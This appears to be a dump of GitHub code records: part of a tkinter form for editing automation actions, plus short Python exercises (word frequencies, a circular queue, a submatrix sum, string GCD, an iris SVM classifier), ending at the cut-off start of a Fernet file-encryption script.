(self.chdFrm2.children[\"lblRightManualValue\"]).grid_forget()\n (self.chdFrm2.children[\"txtRightManualValue\"]).grid_forget()\n (self.chdFrm2.children[\"frmchdFrm2_2\"]).grid(row=2,column = 2,columnspan=2,padx=(10, 10),sticky=tk.N+tk.W)\n else:\n self.var_rightInputType.set(\"ManualValue\")\n (self.chdFrm2.children[\"lblRightManualValue\"]).grid(row=2,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.E)\n (self.chdFrm2.children[\"txtRightManualValue\"]).grid(row=2,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.W)\n (self.chdFrm2.children[\"frmchdFrm2_2\"]).grid_forget()\n \n def fncUpdateInnerChildForm(self): \n selected_items = self.treev2.selection() \n for x in selected_items: \n self.var_actionId.set(self.treev2.item(x)[\"values\"][0]) \n self.var_actionType.set(self.treev2.item(x)[\"values\"][1]) \n self.var_ActionStartupType.set(self.treev2.item(x)[\"values\"][2]) \n self.var_controlSelectorType.set(self.treev2.item(x)[\"values\"][3]) \n self.var_control.set(self.treev2.item(x)[\"values\"][4]) \n self.var_inputType.set(self.treev2.item(x)[\"values\"][5]) \n self.var_manualValue.set(self.treev2.item(x)[\"values\"][6]) \n self.var_ioValue.set(self.treev2.item(x)[\"values\"][7]) \n self.var_nextActionId.set(self.treev2.item(x)[\"values\"][8]) \n self.var_conditionType.set(self.treev2.item(x)[\"values\"][9]) \n self.var_leftInputType.set(self.treev2.item(x)[\"values\"][10]) \n self.var_leftManualValue.set(self.treev2.item(x)[\"values\"][11]) \n self.var_leftIOValue.set(self.treev2.item(x)[\"values\"][12]) \n self.var_trueActionId.set(self.treev2.item(x)[\"values\"][13]) \n self.var_rightInputType.set(self.treev2.item(x)[\"values\"][14]) \n self.var_rightManualValue.set(self.treev2.item(x)[\"values\"][15]) \n self.var_rightIOValue.set(self.treev2.item(x)[\"values\"][16]) \n self.var_falseActionId.set(self.treev2.item(x)[\"values\"][17]) \n \n self.treev2_selected_items=x\n self.treev2_selected_index=self.treev2.index(x)\n self.IsUpdateAction=True\n self.fncOpenInnerChildForm()\n\n def fncAddInnerChildForm(self):\n self.IsUpdateAction=False\n self.fncOpenInnerChildForm()\n \n def fncOpenInnerChildForm(self): \n containter = tk.Toplevel(self.frmHeader1) \n containter.title(\"Add Action\")\n containter.geometry(\"700x400\")\n innercontainter=ttk.Frame(containter) \n innercontainter.pack(expand=\"True\",fill=tk.BOTH,anchor=\"nw\",side=tk.LEFT)\n innercontainter.columnconfigure(0, weight=1)\n innercontainter.rowconfigure(0, weight=1)\n chdFrm=ttk.Frame(innercontainter) \n chdFrm.grid(row=0,column=0,sticky=tk.N+tk.W)\n chdFrm.columnconfigure(0, weight=1)\n chdFrm.columnconfigure(1, weight=1)\n chdFrm.columnconfigure(2, weight=1)\n chdFrm.columnconfigure(3, weight=1)\n chdFrm.rowconfigure(0, weight=1)\n chdFrm.rowconfigure(1, weight=1)\n chdFrm.rowconfigure(2, weight=1)\n chdFrm.rowconfigure(3, weight=1)\n chdFrm.rowconfigure(4, weight=1) \n\n ttk.Label(chdFrm,text = \"Action ID :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(chdFrm, width = 26, textvariable = self.var_actionId).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm,text = \"Action Type :\").grid(row=0,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbActionType=ttk.Combobox(chdFrm, width = 24, textvariable = self.var_actionType, values=self.var_allActionType)\n cmbActionType.grid(row=0,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n \n ttk.Label(chdFrm,text = \"Startup Type :\").grid(row=1,column = 
0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n rdoFrm=ttk.Frame(chdFrm)\n rdoFrm.grid(row=1,column = 1,padx=(10, 10),columnspan=3, pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Radiobutton(rdoFrm,text=\"Start\",value=\"Start\",variable = self.var_ActionStartupType).grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Radiobutton(rdoFrm,text=\"End\",value=\"End\",variable = self.var_ActionStartupType).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Radiobutton(rdoFrm,text=\"Middle\",value=\"Middle\",variable = self.var_ActionStartupType).grid(row=0,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n self.chdFrm1=None\n self.chdFrm1=ttk.Frame(chdFrm) \n self.chdFrm1.grid(row=2,column=0,columnspan=4)\n self.chdFrm1.columnconfigure(0, weight=1)\n self.chdFrm1.columnconfigure(1, weight=1)\n self.chdFrm1.columnconfigure(2, weight=1)\n self.chdFrm1.columnconfigure(3, weight=1)\n self.chdFrm1.rowconfigure(0, weight=1)\n self.chdFrm1.rowconfigure(1, weight=1)\n self.chdFrm1.rowconfigure(2, weight=1)\n\n ttk.Label(self.chdFrm1,text = \"Selector Type :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Combobox(self.chdFrm1, width = 24,state=\"readonly\" , textvariable = self.var_controlSelectorType, values=self.var_allSelectorType).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm1,text = \"Control :\" ).grid(row=0,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm1, name=\"txtControl\",width = 26, textvariable = self.var_control).grid(row=0,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n ttk.Label(self.chdFrm1,text = \"Input Type :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbInputType =ttk.Combobox(self.chdFrm1, width = 24,state=\"readonly\" , textvariable = self.var_inputType, values=self.var_allInputType)\n cmbInputType.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n ttk.Label(self.chdFrm1,name=\"lblManualValue\" ,text = \"Manual Value :\" ).grid(row=1,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n self.txtManualValue=ttk.Entry(self.chdFrm1,name=\"txtManualValue\", width = 26, textvariable = self.var_manualValue)\n self.txtManualValue.grid(row=1,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n chdFrm1_1=ttk.LabelFrame(self.chdFrm1,name=\"frmchdFrm1_1\",text=\"Choose IO Value\",style=\"Details.TLabelframe\")\n chdFrm1_1.grid(row=2,column = 0,columnspan=4,sticky=tk.N+tk.W)\n ttk.Label(chdFrm1_1,text = \"Function Name :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_0_FunctionName=ttk.Combobox(chdFrm1_1, width = 24,state=\"readonly\" , textvariable = self.var_0_FunctionName, values=self.val_AllFunctionName)\n cmbvar_0_FunctionName.grid(row=0,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm1_1, text = \"Section Name :\").grid(row=0,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_0_SectionName=ttk.Combobox(chdFrm1_1, width = 24,state=\"readonly\" , textvariable = self.var_0_SectionName,values=self.var_allSectionCategory)\n cmbvar_0_SectionName.grid(row=0,column = 3,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm1_1 ,text = \"Key Name :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_0_KeyName=ttk.Combobox(chdFrm1_1, name=\"var_0_KeyName\",width = 
24,state=\"readonly\" , textvariable = self.var_0_KeyName)\n cmbvar_0_KeyName.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm1_1, text = \"IO Value :\").grid(row=1,column = 2,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.E)\n self.txtIOValue=ttk.Entry(chdFrm1_1,name=\"txtIOValue\" ,width = 26,state=\"readonly\" , textvariable = self.var_ioValue)\n self.txtIOValue.grid(row=1,column = 3,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.W)\n\n cmbvar_0_FunctionName.bind(\"<>\", lambda event: self.BindKeyName(1,False))\n cmbvar_0_SectionName.bind(\"<>\", lambda event: self.BindKeyName(1,True))\n cmbvar_0_KeyName.bind(\"<>\", lambda event: self.BindKeyName(1,False))\n\n ttk.Label(self.chdFrm1,text = \"Next Action Id :\").grid(row=3,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm1, width = 26, textvariable = self.var_nextActionId).grid(row=3,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n self.chdFrm2=None\n self.chdFrm2=ttk.Frame(chdFrm) \n self.chdFrm2.grid(row=4,column=0,columnspan=4)\n self.chdFrm2.columnconfigure(0, weight=1)\n self.chdFrm2.columnconfigure(1, weight=1)\n self.chdFrm2.columnconfigure(2, weight=1)\n self.chdFrm2.columnconfigure(3, weight=1)\n self.chdFrm2.columnconfigure(4, weight=1)\n self.chdFrm2.rowconfigure(0, weight=1)\n self.chdFrm2.rowconfigure(1, weight=1)\n self.chdFrm2.rowconfigure(2, weight=1)\n self.chdFrm2.rowconfigure(3, weight=1)\n\n ttk.Label(self.chdFrm2,text = \"Condition Type :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Combobox(self.chdFrm2, width = 24, textvariable = self.var_conditionType, values=self.var_allConditionType).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm2,text = \"Left Input Type :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbLeftInputType=ttk.Combobox(self.chdFrm2, width = 24,state=\"readonly\" , textvariable = self.var_leftInputType, values=self.var_allInputType)\n cmbLeftInputType.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n ttk.Label(self.chdFrm2,name=\"lblLeftManualValue\",text = \"Left Manual Value :\" ).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm2,name=\"txtLeftManualValue\" ,width = 26, textvariable = self.var_leftManualValue).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n chdFrm2_1=ttk.LabelFrame(self.chdFrm2,name=\"frmchdFrm2_1\",text=\"Choose Left IO Value\",style=\"Details.TLabelframe\")\n chdFrm2_1.grid(row=3,column = 0,columnspan=2,padx=(10, 10),sticky=tk.N+tk.W)\n\n ttk.Label(chdFrm2_1,text = \"Function Name :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_1_FunctionName=ttk.Combobox(chdFrm2_1, width = 24,state=\"readonly\" , textvariable = self.var_1_FunctionName, values=self.val_AllFunctionName)\n cmbvar_1_FunctionName.grid(row=0,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm2_1, text = \"Section Name :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_1_SectionName=ttk.Combobox(chdFrm2_1, width = 24,state=\"readonly\" , textvariable = self.var_1_SectionName,values=self.var_allSectionCategory)\n cmbvar_1_SectionName.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm2_1 ,text = \"Key Name :\").grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), 
        cmbvar_1_KeyName=ttk.Combobox(chdFrm2_1, name=\"var_1_KeyName\",width=24,state=\"readonly\", textvariable = self.var_1_KeyName)\n        cmbvar_1_KeyName.grid(row=2,column=1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n        ttk.Label(chdFrm2_1, text=\"IO Value :\").grid(row=3,column=0,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.E)\n        txtLeftIOValue=ttk.Entry(chdFrm2_1,name=\"txtLeftIOValue\",width=26,state=\"readonly\", textvariable = self.var_leftIOValue)\n        txtLeftIOValue.grid(row=3,column=1,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.W)\n\n        cmbvar_1_FunctionName.bind(\"<<ComboboxSelected>>\", lambda event: self.BindKeyName(2,False))\n        cmbvar_1_SectionName.bind(\"<<ComboboxSelected>>\", lambda event: self.BindKeyName(2,True))\n        cmbvar_1_KeyName.bind(\"<<ComboboxSelected>>\", lambda event: self.BindKeyName(2,False))\n\n        ttk.Label(self.chdFrm2,text=\"True Next ActionId :\").grid(row=4,column=0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n        ttk.Entry(self.chdFrm2, width=26, textvariable = self.var_trueActionId).grid(row=4,column=1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n        ttk.Label(self.chdFrm2,text=\"Right Input Type :\").grid(row=1,column=2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n        cmbRightInputType=ttk.Combobox(self.chdFrm2, width=24,state=\"readonly\", textvariable = self.var_rightInputType, values=self.var_allInputType)\n        cmbRightInputType.grid(row=1,column=3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n        ttk.Label(self.chdFrm2,name=\"lblRightManualValue\",text=\"Right Manual Value :\").grid(row=2,column=2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n        ttk.Entry(self.chdFrm2,name=\"txtRightManualValue\",width=26, textvariable = self.var_rightManualValue).grid(row=2,column=3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n        # The right-hand IO picker mirrors the left-hand one above.\n        chdFrm2_2=ttk.LabelFrame(self.chdFrm2,name=\"frmchdFrm2_2\",text=\"Choose Right IO Value\",style=\"Details.TLabelframe\")\n        chdFrm2_2.grid(row=3,column=2,columnspan=2,padx=(10, 10),sticky=tk.N+tk.W)\n\n        ttk.Label(chdFrm2_2,text=\"Function Name :\").grid(row=0,column=0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n        cmbvar_2_FunctionName=ttk.Combobox(chdFrm2_2, width=24,state=\"readonly\", textvariable = self.var_2_FunctionName, values=self.val_AllFunctionName)\n        cmbvar_2_FunctionName.grid(row=0,column=1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n        ttk.Label(chdFrm2_2, text=\"Section Name :\").grid(row=1,column=0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n        cmbvar_2_SectionName=ttk.Combobox(chdFrm2_2, width=24,state=\"readonly\", textvariable = self.var_2_SectionName,values=self.var_allSectionCategory)\n        cmbvar_2_SectionName.grid(row=1,column=1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n        ttk.Label(chdFrm2_2,text=\"Key Name :\").grid(row=2,column=0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n        cmbvar_2_KeyName=ttk.Combobox(chdFrm2_2, name=\"var_2_KeyName\",width=24,state=\"readonly\", textvariable = self.var_2_KeyName)\n        cmbvar_2_KeyName.grid(row=2,column=1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n        ttk.Label(chdFrm2_2, text=\"IO Value :\").grid(row=3,column=0,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.E)\n        
= 26,state=\"readonly\" , textvariable = self.var_rightIOValue)\n txtRightIOValue.grid(row=3,column = 1,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.W)\n\n cmbvar_2_FunctionName.bind(\"<>\", lambda event: self.BindKeyName(3,False))\n cmbvar_2_SectionName.bind(\"<>\", lambda event: self.BindKeyName(3,True))\n cmbvar_2_KeyName.bind(\"<>\", lambda event: self.BindKeyName(3,False))\n\n\n # ttk.Label(self.chdFrm2,text = \"Right IOValue :\" ).grid(row=3,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n # ttk.Entry(self.chdFrm2, width = 26, textvariable = self.var_rightIOValue).grid(row=3,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm2,text = \"False Next ActionId :\" ).grid(row=4,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm2, width = 26, textvariable = self.var_falseActionId).grid(row=4,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Button(chdFrm, text =\"Save\", width=10, command =lambda: self.fncAddAction(containter)).grid(row=5,column = 1 , padx=(10,0),pady=(3,5),sticky=tk.N+tk.W)\n containter.grab_set()\n self.fncChangeActionType(None) \n self.fncChangeInputType(None,1)\n self.fncChangeInputType(None,2)\n self.fncChangeInputType(None,3)\n containter.protocol(\"WM_DELETE_WINDOW\", lambda :self.fncCloseInnerChild(containter))\n cmbActionType.bind(\"<>\", lambda event: self.fncChangeActionType(event))\n cmbInputType.bind(\"<>\", lambda event: self.fncChangeInputType(event,1))\n cmbLeftInputType.bind(\"<>\", lambda event: self.fncChangeInputType(event,2))\n cmbRightInputType.bind(\"<>\", lambda event: self.fncChangeInputType(event,3))\n \n\n def fncCloseInnerChild(self,container): \n self.ContainerFrame.children[\"frmChildForm\"].focus_set()\n self.ContainerFrame.children[\"frmChildForm\"].grab_set()\n container.destroy()\n\n def fncAddAction(self,container):\n if(self.var_actionId==None or self.var_actionId.get()==\"\" ):\n messagebox.showerror(\"Required\", \"Required Action Id\")\n return\n if(self.var_actionType==None or self.var_actionType.get()==\"\" ):\n messagebox.showerror(\"Required\", \"Required Action Type\")\n return\n if(self.var_ActionStartupType==None or self.var_ActionStartupType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required startup type\")\n return\n if(self.var_actionType.get()==\"Wait\"):\n if(self.var_manualValue==None or self.var_manualValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Manual Value\")\n return\n elif(not (self.var_actionType.get()==\"Condition\" or self.var_actionType.get()==\"Find Index\")) :\n if(self.var_controlSelectorType==None or self.var_controlSelectorType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Selector Type\")\n return\n if(self.var_control==None or self.var_control.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Control\")\n return\n if(self.var_inputType==None or self.var_inputType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Input Type\")\n return\n if(self.var_inputType.get()==\"ManualValue\"):\n if(self.var_manualValue==None or self.var_manualValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Manual Value\")\n return\n else:\n if(self.var_ioValue==None or self.var_ioValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required IO Value\")\n return\n if(self.var_nextActionId==None or self.var_nextActionId.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Next Action Id\")\n return\n else:\n 
if(self.var_conditionType==None or self.var_conditionType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Condition Type\")\n return\n if(self.var_leftInputType==None or self.var_leftInputType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Left Input Type\")\n return\n if(self.var_leftInputType.get()==\"ManualValue\"):\n if(self.var_leftManualValue==None or self.var_leftManualValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Left Manual Value\")\n return\n else:\n if(self.var_leftIOValue==None or self.var_leftIOValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Left IO Value\")\n return\n if(self.var_rightInputType==None or self.var_rightInputType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Right Input Type\")\n return\n if(self.var_rightInputType.get()==\"ManualValue\"):\n if(self.var_rightManualValue==None or self.var_rightManualValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Right Manual Value\")\n return\n else:\n if(self.var_rightIOValue==None or self.var_rightIOValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Right IO Value\")\n return\n\n if(self.var_trueActionId==None or self.var_trueActionId.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required True Action Id\")\n return\n if(self.var_falseActionId==None or self.var_falseActionId.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required False Action Id\")\n return\n if(self.IsUpdateAction):\n self.treev2.delete(self.treev2_selected_items)\n self.treev2.insert(\"\", self.treev2_selected_index,values =(self.var_actionId.get(), self.var_actionType.get(),self.var_ActionStartupType.get(),\n self.var_controlSelectorType.get(),self.var_control.get(),self.var_inputType.get(),self.var_manualValue.get(),self.var_ioValue.get(),self.var_nextActionId.get(),\n self.var_conditionType.get(),self.var_leftInputType.get(),self.var_leftManualValue.get(),self.var_leftIOValue.get(),self.var_trueActionId.get(),\n self.var_rightInputType.get(),self.var_rightManualValue.get(),self.var_rightIOValue.get(),self.var_falseActionId.get()\n ))\n self.IsUpdateAction=False\n else:\n self.treev2.insert(\"\", 'end',values =(self.var_actionId.get(), self.var_actionType.get(),self.var_ActionStartupType.get(),\n self.var_controlSelectorType.get(),self.var_control.get(),self.var_inputType.get(),self.var_manualValue.get(),self.var_ioValue.get(),self.var_nextActionId.get(),\n self.var_conditionType.get(),self.var_leftInputType.get(),self.var_leftManualValue.get(),self.var_leftIOValue.get(),self.var_trueActionId.get(),\n self.var_rightInputType.get(),self.var_rightManualValue.get(),self.var_rightIOValue.get(),self.var_falseActionId.get()\n ))\n #reset the data\n self.var_control.set(\"\")\n self.var_manualValue.set(\"\")\n self.var_leftManualValue.set(\"\")\n self.var_rightInputType.set(\"\")\n self.var_actionId.set(\"\")\n self.var_nextActionId.set(\"\")\n self.var_trueActionId.set(\"\")\n self.var_falseActionId.set(\"\")\n self.var_ActionStartupType.set(\"Middle\")\n self.chdFrm1.children[\"txtControl\"].focus_set() \n\n messagebox.showinfo(\"Success\", \"Action added successfully\")\n\n\n \n\nif __name__ == '__main__':\n config= Gc.GenerateConfig() \n \n root = tk.Tk()\n sizex = 600\n sizey = 400\n posx = 100\n posy = 100\n root.wm_geometry(\"%dx%d+%d+%d\" % (sizex, sizey, posx, posy))\n config.set_theme(None,root)\n config.set_icons()\n myframe=tk.Frame(root,relief=tk.GROOVE,width=500,height=600,bd=1)\n myframe.pack( fill=\"both\" 
,expand=tk.TRUE ,anchor=tk.N+tk.W)\n    AddTemplate(myframe,config)\n    root.eval('tk::PlaceWindow . center')\n    root.mainloop()\n","repo_name":"xyzprabhakar/AFill","sub_path":"frmAddTemplate.py","file_name":"frmAddTemplate.py","file_ext":"py","file_size_in_byte":69516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31459952333","text":"import sys\n\n# Count word frequencies in the input file and write the ten most common to the output file.\nf1 = open(sys.argv[1])\nf2 = open(sys.argv[2], \"r+\")\nr1 = f1.read()\nv1 = r1.split()\nd = {}\ni = 0\nfor key in set(v1):\n    d[key] = v1.count(key)\nfor k, m in sorted(d.items(), key=lambda x: -x[1]):\n    if i < 10:\n        print(\" \" + str(m) + \": \" + str(k))\n        f2.write(\" \" + str(m) + \" \" + str(k) + \"\\n\")\n        i += 1\n    else:\n        break\nf1.close()\nf2.close()\n","repo_name":"YajimaxYuki/kadai2018","sub_path":"trial/freq.py","file_name":"freq.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28012562","text":"# When we reach the end of the queue, we start again from the beginning of the queue.\nclass MyCircularQueue:\n\n    def __init__(self, k):\n        self.k = k\n        self.queue = [None] * k\n        self.head = self.tail = -1\n\n    # Insert an element into the circular queue\n    # 1. check whether the queue is full\n    # 2. check whether this is the first insert\n    # 3. enqueue\n    def enqueue(self, data):\n        if ((self.tail + 1) % self.k == self.head):\n            print(\"The circular queue is full\\n\")\n        elif (self.head == -1):\n            self.head = 0\n            self.tail = 0\n            self.queue[self.tail] = data\n        else:\n            self.tail = (self.tail + 1) % self.k\n            self.queue[self.tail] = data\n\n    # Delete an element from the circular queue\n    # 1. check whether the queue is empty\n    # 2. check whether this is the last element\n    # 3. dequeue\n    def dequeue(self):\n        if (self.head == -1):\n            print(\"The queue is empty\")\n        # only one element\n        elif (self.head == self.tail):\n            temp = self.queue[self.head]\n            self.head = -1\n            self.tail = -1\n            return temp\n        else:\n            temp = self.queue[self.head]\n            self.head = (self.head + 1) % self.k\n            return temp\n\n    def printQueue(self):\n        if (self.head == -1):\n            print(\"No element in the circular queue\")\n        # '>=' so the single-element case (head == tail) prints correctly\n        elif (self.tail >= self.head):\n            for i in range(self.head, self.tail + 1):\n                print(self.queue[i], end=\" \")\n            print()\n        else:\n            for i in range(self.head, self.k):\n                print(self.queue[i], end=\" \")\n            for i in range(0, self.tail + 1):\n                print(self.queue[i], end=\" \")\n            print()\n
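\n\n# A minimal usage sketch of the class above; the capacity and values are illustrative.\nif __name__ == \"__main__\":\n    q = MyCircularQueue(3)\n    q.enqueue(1)\n    q.enqueue(2)\n    q.enqueue(3)\n    q.enqueue(4)  # full: (tail + 1) % k == head, so the value is rejected\n    q.printQueue()  # 1 2 3\n    print(q.dequeue())  # 1; head advances and the slot can be reused\n    q.enqueue(4)  # wraps around to the freed slot at index 0\n    q.printQueue()  # 2 3 4\n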
","repo_name":"dongjun-Yi/DataStructure-study","sub_path":"queue_python/circularQueue.py","file_name":"circularQueue.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3606689034","text":"n, m = [int(x) for x in input().split(', ')]\n\nmatrix = []\n\nfor x in range(n):\n    elements = [int(x) for x in input().split(', ')]\n    matrix.append(elements)\n\n\ndef get_sum_of_submatrix(matrix, row_index, column_index, size):\n    the_sum = 0\n\n    for r in range(row_index, row_index + size):\n        for c in range(column_index, column_index + size):\n            the_sum += matrix[r][c]\n\n    return the_sum\n\n\nSIZE = 2\n\n\ndef get_the_best_sum(matrix, size):\n    best_sum = get_sum_of_submatrix(matrix, 0, 0, size)\n    best_row_index = 0\n    best_column_index = 0\n\n    for r in range(len(matrix) - size + 1):\n        for c in range(len(matrix[r]) - size + 1):\n            current_sum = get_sum_of_submatrix(matrix, r, c, size)\n\n            if best_sum < current_sum:\n                best_sum = current_sum\n                best_row_index = r\n                best_column_index = c\n\n    return best_row_index, best_column_index\n\n\ndef print_result(coordinates, size):\n    (row_index, col_index) = coordinates\n\n    for r in range(row_index, row_index + size):\n        row = []\n        for c in range(col_index, col_index + size):\n            row.append(matrix[r][c])\n\n        print(' '.join(str(s) for s in row))\n    print(get_sum_of_submatrix(matrix, row_index, col_index, size))\n\n\ncoordinates = get_the_best_sum(matrix, SIZE)\nprint_result(coordinates, SIZE)\n","repo_name":"Velin-Todorov/SoftUni","sub_path":"Multidimensional lists/square with maximum sum.py","file_name":"square with maximum sum.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"3793361584","text":"from math import gcd\n\nstr1 = \"ABCABC\"\nstr2 = \"ABC\"\n\nstr1 = \"ABABAB\"\nstr2 = \"ABAB\"\n\n# str1 = \"LEET\"\n# str2 = \"CODE\"\n\n\ndef gcdOfStrings(str1: str, str2: str) -> str:\n    n1 = len(str1)\n    n2 = len(str2)\n    n = min(n1, n2)\n    while n > 0:\n        if n1 % n == 0 and n2 % n == 0:\n            result = str1[:n]\n            m1 = n1//n\n            m2 = n2//n\n            if str1 == m1*result and str2 == m2*result:\n                return result\n        n -= 1\n    return ''\n\nprint(gcdOfStrings(str1, str2))\n\nprint(str1[:gcd(len(str1), len(str2))])","repo_name":"gauthierbeaudoux/LeetCode","sub_path":"1071_GreatestCommonDivisorStrings.py","file_name":"1071_GreatestCommonDivisorStrings.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30557309385","text":"from sklearn import model_selection, svm, metrics\nimport pandas as pd\n\ncsv = pd.read_csv(\"iris.csv\")\ndata = csv[[\"SepalLength\",\"SepalWidth\",\"PetalLength\",\"PetalWidth\"]]\nlabel = csv[\"Name\"]\n\ntrain_data, test_data, train_label, test_label = \\\n    model_selection.train_test_split(data, label)\n\nclf = svm.SVC()\nclf.fit(train_data, train_label)\nresult = clf.predict(test_data)\nprint(result)\nscore = metrics.accuracy_score(test_label, result)\nprint(score)","repo_name":"hanwjdgh/Docker-M-D-learning","sub_path":"sklearn/sklearn2.py","file_name":"sklearn2.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19922897545","text":"import os\nfrom cryptography.fernet import Fernet\n\n\n# creates the list that will be used to know what to encrypt\nmyfile = 